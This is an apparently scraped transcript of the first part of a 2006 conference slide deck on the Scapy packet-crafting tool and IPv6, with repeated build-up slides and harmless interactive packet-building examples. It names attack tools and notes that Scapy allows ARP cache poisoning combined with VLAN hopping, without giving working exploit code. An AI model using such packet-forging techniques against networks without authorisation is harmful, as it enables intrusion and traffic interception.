scapy-IPv6_HITB06
-
Upload
oscar-pacheco -
Category
Documents
-
view
174 -
download
0
Transcript of scapy-IPv6_HITB06
![Page 1: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/1.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Scapy and IPv6 networking
Philippe BIONDI Arnaud EBALARD
phil(at)secdev.org / philippe.biondi(at)eads.net
troglocan(at)droids-corp.org / arnaud.ebalard(at)eads.net
EADS Corporate Research Center — DCR/STI/CIT Sec lab
Suresnes, FRANCE
Hack In The Box 2006
P. Biondi / A. Ebalard Scapy and IPv6 networking 1/100
![Page 2: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/2.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Beware! IPv6 is coming, and it is not happy!
The everything is connected world needs IPv6, but
IPv6 sometimes looks simple and it is complex
Many implementation bugs are waiting undercover
Best practices painfully acquired for IPv4 are not there yet forIPv6
Let’s make something cool and we’ll secure it later mentality
We need test tools to
Emerge best practices
Hunt bugs
Demonstrate flaws
Show actual risks
P. Biondi / A. Ebalard Scapy and IPv6 networking 2/100
![Page 3: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/3.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Beware! IPv6 is coming, and it is not happy!
The everything is connected world needs IPv6, but
IPv6 sometimes looks simple and it is complex
Many implementation bugs are waiting undercover
Best practices painfully acquired for IPv4 are not there yet forIPv6
Let’s make something cool and we’ll secure it later mentality
We need test tools to
Emerge best practices
Hunt bugs
Demonstrate flaws
Show actual risks
P. Biondi / A. Ebalard Scapy and IPv6 networking 2/100
![Page 4: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/4.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 3/100
![Page 5: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/5.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Quick goal-oriented taxonomy of packet building tools
Packet forging Sniffing
Testing
Scanning Fingerprinting
Attacking
P. Biondi / A. Ebalard Scapy and IPv6 networking 4/100
![Page 6: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/6.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Many programsSorry for possible classification errors !
Sniffing tools
ethereal, tcpdump, net2pcap, cdpsniffer, aimsniffer, vomit,tcptrace, tcptrack, nstreams, argus, karpski, ipgrab, nast, cdpr,aldebaran, dsniff, irpas, iptraf, . . .
Packet forging tools
packeth, packit, packet excalibur, nemesis, tcpinject, libnet, IPsorcery, pacgen, arp-sk, arpspoof, dnet, dpkt, pixiliate, irpas,sendIP, IP-packetgenerator, sing, aicmpsend, libpal, . . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 5/100
![Page 7: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/7.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Many programs
Testing tools
ping, hping2, hping3, traceroute, tctrace, tcptraceroute,traceproto, fping, arping, . . .
Scanning tools
nmap, amap, vmap, hping3, unicornscan, ttlscan, ikescan, paketto,firewalk, . . .
Fingerprinting tools
nmap, xprobe, p0f, cron-OS, queso, ikescan, amap, synscan, . . .
Attacking tools
dnsspoof, poison ivy, ikeprobe, ettercap, dsniff suite, cain, hunt,airpwn, irpas, nast, yersinia, . . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 6/100
![Page 8: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/8.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools can’t forge exactly what you want
Most tools support no more than the TCP/IP protocol suite
Building a whole packet with a command line tool is nearunbearable, and is really unbearable for a set of packets
=⇒ Popular tools use templates or scenarii with few fields to fill toget a working (set of) packets
=⇒ You’ll never do something the author did not imagine
=⇒ You often need to write a new tool
j But building a single working packet from scratch in C takesan average of 60 lines
P. Biondi / A. Ebalard Scapy and IPv6 networking 7/100
![Page 9: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/9.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Combining technics is not possible
Example
Imagine you have an ARP cache poisoning tool
Imagine you have a double 802.1q encapsulation tool
=⇒ You still can’t do ARP cache poisoning with double 802.1qencapsulation
=⇒ You need to write a new tool ... again.
P. Biondi / A. Ebalard Scapy and IPv6 networking 8/100
![Page 10: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/10.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools can’t forge exactly what you want
Example
Try to find a tool that can do
an ICMP echo request with some given padding data
an IP protocol scan with the More Fragments flag
some ARP cache poisoning with a VLAN hopping attack
a traceroute with an applicative payload (DNS, ISAKMP, etc.)
P. Biondi / A. Ebalard Scapy and IPv6 networking 9/100
![Page 11: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/11.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Decoding vs interpreting
decoding: I received a RST packet from port 80
interpreting: The port 80 is closed
Machines are good at decoding and can help human beings
Interpretation is for human beings
P. Biondi / A. Ebalard Scapy and IPv6 networking 10/100
![Page 12: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/12.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered
Port 113 is closed.
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 13: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/13.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered
Port 113 is closed.
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 14: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/14.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situations
Work with basic logic and reasoning
Limited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered WRONG! it was an host unreachable error.The firewall wanted the packet to go through but no hostanswered the ARP request.
Port 113 is closed.
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 15: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/15.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
A lot of tools interpret instead of decoding
Work on specific situationsWork with basic logic and reasoningLimited to what the programmer expected to receive
=⇒ unexpected things keep being unnoticed
Interesting ports on xx.xx.19.3:
PORT STATE SERVICE
79/tcp filtered finger
113/tcp closed auth
Port 79 is filtered WRONG! it was an host unreachable error.The firewall wanted the packet to go through but no hostanswered the ARP request.
Port 113 is closed. WRONG! the port is actually open on thebox but the router before it spoofed a TCP reset
P. Biondi / A. Ebalard Scapy and IPv6 networking 11/100
![Page 16: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/16.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 17: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/17.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 18: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/18.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 19: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/19.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 20: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/20.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 21: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/21.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
Did you see ?
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 22: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/22.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Most tools partially decode what they receive
Show only what the programmer expected to be useful
=⇒ unexpected things keep being unnoticed
Example
# hping --icmp 192.168.8.1
HPING 192.168.8.1 (eth0 192.168.8.1): icmp mode set, [...]
len=46 ip=192.168.8.1 ttl=64 id=42457 icmp_seq=0 rtt=2.7 ms
IP 192.168.8.1 > 192.168.8.14: icmp 8: echo reply seq 0
0001 4321 1d3f 0002 413d 4b23 0800 4500 ..G../..A.K...E.
001c a5d9 0000 4001 43a8 c0a8 0801 c0a8 [email protected].......
080e 0000 16f6 e909 0000 0000 0000 0000 ................
0000 0000 0000 0000 13e5 c24b ...........K
Did you see ? Some data leaked into the padding (Etherleaking).
P. Biondi / A. Ebalard Scapy and IPv6 networking 12/100
![Page 23: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/23.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
Popular tools bias our perception of networked systems
Very few popular tools (nmap, hping)
Popular tools give a subjective vision of tested systems
=⇒ The world is seen only through those tools
=⇒ You won’t notice what they can’t see
=⇒ Bugs, flaws, . . . may remain unnoticed on very well testedsystems because they are always seen through the same tools,with the same bias
P. Biondi / A. Ebalard Scapy and IPv6 networking 13/100
![Page 24: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/24.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 14/100
![Page 25: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/25.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Scapy ’s Main Concepts
Python interpreter disguised as a Domain Specific Language
Extensible design
Fast packet designing
Default values that work
No special values
Unlimited combinations
Probe once, interpret many
Interactive packet and result manipulation
P. Biondi / A. Ebalard Scapy and IPv6 networking 15/100
![Page 26: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/26.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Scapy as a Domain Specific Language
List of layers
>>> ls()
ARP : ARP
DHCP : DHCP options
DNS : DNS
Dot11 : 802.11
[...]
List of commands
>>> lsc()
sr : Send and receive packets at layer 3
sr1 : Send packets at layer 3 and return only the fi
srp : Send and receive packets at layer 2
[...]
P. Biondi / A. Ebalard Scapy and IPv6 networking 16/100
![Page 27: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/27.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Extensible design
One use (others)
Core+2 or 3 layers
+1 technique
Many uses (Scapy)
Technics
Core Layers
custom
Scapy is not monolithic
The core is responsible for packetassembly mechanisms, interactionswith the kernel, etc.
The layer part describes layers
The techniques part relies on coreand layers.
When the core improves, allexisting layers take advantage of it.
When new layers are added, theyimmediately benefit from the core.
P. Biondi / A. Ebalard Scapy and IPv6 networking 17/100
![Page 28: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/28.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Extensible design
One use (others)
Core+2 or 3 layers
+1 technique
Many uses (Scapy)
Technics
Core Layers
custom
Scapy is not monolithic
The core is responsible for packetassembly mechanisms, interactionswith the kernel, etc.
The layer part describes layers
The techniques part relies on coreand layers.
When the core improves, allexisting layers take advantage of it.
When new layers are added, theyimmediately benefit from the core.
P. Biondi / A. Ebalard Scapy and IPv6 networking 17/100
![Page 29: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/29.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Fast packet designing
Each packet is built layer by layer (ex: Ether, IP, TCP, . . . )
Each layer can be stacked on another
Each layer or packet can be manipulated
Each field has working default values
Each field can contain a value or a set of values
Example
>>> a=IP(dst="www.target.com", id=0x42)
>>> a.ttl=12
>>> b=TCP(dport=[22,23,25,80,443])
>>> c=a/b
P. Biondi / A. Ebalard Scapy and IPv6 networking 18/100
![Page 30: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/30.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Fast packet designing
How to order food at a Fast Food
I want a BigMac, French Fries with Ketchup and Mayonnaise, upto 9 Chicken Wings and a Diet Coke
How to order a Packet with Scapy
I want a broadcast MAC address, and IP payload to ketchup.comand to mayo.com, TTL value from 1 to 9, and an UDP payload.
Ether(dst="ff:ff:ff:ff:ff:ff")
/IP(dst=["ketchup.com","mayo.com"],ttl=(1,9))
/UDP()
We have 18 packets defined in 1 line (1 implicit packet)
P. Biondi / A. Ebalard Scapy and IPv6 networking 19/100
![Page 31: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/31.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Fast packet designing
How to order food at a Fast Food
I want a BigMac, French Fries with Ketchup and Mayonnaise, upto 9 Chicken Wings and a Diet Coke
How to order a Packet with Scapy
I want a broadcast MAC address, and IP payload to ketchup.comand to mayo.com, TTL value from 1 to 9, and an UDP payload.
Ether(dst="ff:ff:ff:ff:ff:ff")
/IP(dst=["ketchup.com","mayo.com"],ttl=(1,9))
/UDP()
We have 18 packets defined in 1 line (1 implicit packet)
P. Biondi / A. Ebalard Scapy and IPv6 networking 19/100
![Page 32: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/32.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Default values that work
If not overriden,
IP source is chosen according to destination and routing table
Checksum is computed
Source MAC is chosen according to output interface
Ethernet type and IP protocol are determined by upper layer
. . .
Other fields’ default values are chosen to be the most useful ones:
TCP source port is 20, destination port is 80
UDP source and destination ports are 53
ICMP type is echo request
. . .
P. Biondi / A. Ebalard Scapy and IPv6 networking 20/100
![Page 33: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/33.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Default values that work
Example : Default Values for IP
>>> ls(IP)
version : BitField = (4)
ihl : BitField = (None)
tos : XByteField = (0)
len : ShortField = (None)
id : ShortField = (1)
flags : FlagsField = (0)
frag : BitField = (0)
ttl : ByteField = (64)
proto : ByteEnumField = (0)
chksum : XShortField = (None)
src : Emph = (None)
dst : Emph = (’127.0.0.1’)
options : IPoptionsField = (’’)
P. Biondi / A. Ebalard Scapy and IPv6 networking 21/100
![Page 34: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/34.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
No special values
The special value is the None object
The None object is outside of the set of possible values
=⇒ do not prevent a possible value to be used
P. Biondi / A. Ebalard Scapy and IPv6 networking 22/100
![Page 35: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/35.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Unlimited combinations
With Scapy , you can
Stack what you want where you want
Put any value you want in any field you want
Example
STP()/IP(options="love",chksum=0x1234)
/Dot1Q(prio=1)/Ether(type=0x1234)
/Dot1Q(vlan=(2,123))/TCP()
You know ARP cache poisonning and vlan hopping
=⇒ you can poison a cache with a double VLAN encapsulation
You know VOIP decoding, 802.11 and WEP
=⇒ you can decode a WEP encrypted 802.11 VOIP capture
You know ISAKMP and tracerouting
=⇒ you can traceroute to VPN concentrators
P. Biondi / A. Ebalard Scapy and IPv6 networking 23/100
![Page 36: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/36.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Probe once, interpret many
Main difference with other tools :
The result of a probe is made of
the list of couples (packet sent, packet received)the list of unreplied packet
Interpretation/representation of the result is doneindependently
=⇒ you can refine an interpretation without needing a new probe
Example
You do a TCP scan on an host and see some open ports, aclosed one, and no answer for the others
=⇒ you don’t need a new probe to check the TTL or the IPID ofthe answers and determine whether it was the same box
P. Biondi / A. Ebalard Scapy and IPv6 networking 24/100
![Page 37: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/37.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Probe once, interpret manyThe sr*() functions
sr()
match
netw
ork
Implicit packet set
Result
Unanswered packets
stimulus
response
P. Biondi / A. Ebalard Scapy and IPv6 networking 25/100
![Page 38: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/38.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Outline
1 Introduction to the network testing tools world
2 The Scapy ConceptConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
3 Scapy + IPv6 = Scapy6IPv6Scapy6 capabilitiesICMPv6 Support
4 Fun Security with Scapy6Playing with Routing HeadersQuick OS support summary
5 Conclusion
P. Biondi / A. Ebalard Scapy and IPv6 networking 26/100
![Page 39: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/39.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 40: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/40.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 41: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/41.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 42: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/42.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 43: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/43.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 44: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/44.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 45: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/45.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 46: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/46.jpg)
The Scapy ConceptScapy + IPv6 = Scapy6
Fun Security with Scapy6
ConceptsQuick overviewHigh-level commandsCustom stuff with Scapy
Packet manipulationFirst steps
>>> a=IP(ttl=10)
>>> a
< IP ttl=10 |>
>>> a.src
’127.0.0.1’
>>> a.dst="192.168.1.1"
>>> a
< IP ttl=10 dst=192.168.1.1 |>
>>> a.src
’192.168.8.14’
>>> del(a.ttl)
>>>
P. Biondi / A. Ebalard Scapy and IPv6 networking 27/100
![Page 47: scapy-IPv6_HITB06](https://reader030.fdocuments.in/reader030/viewer/2022013114/5476133db4af9fb40a8b600c/html5/thumbnails/47.jpg)
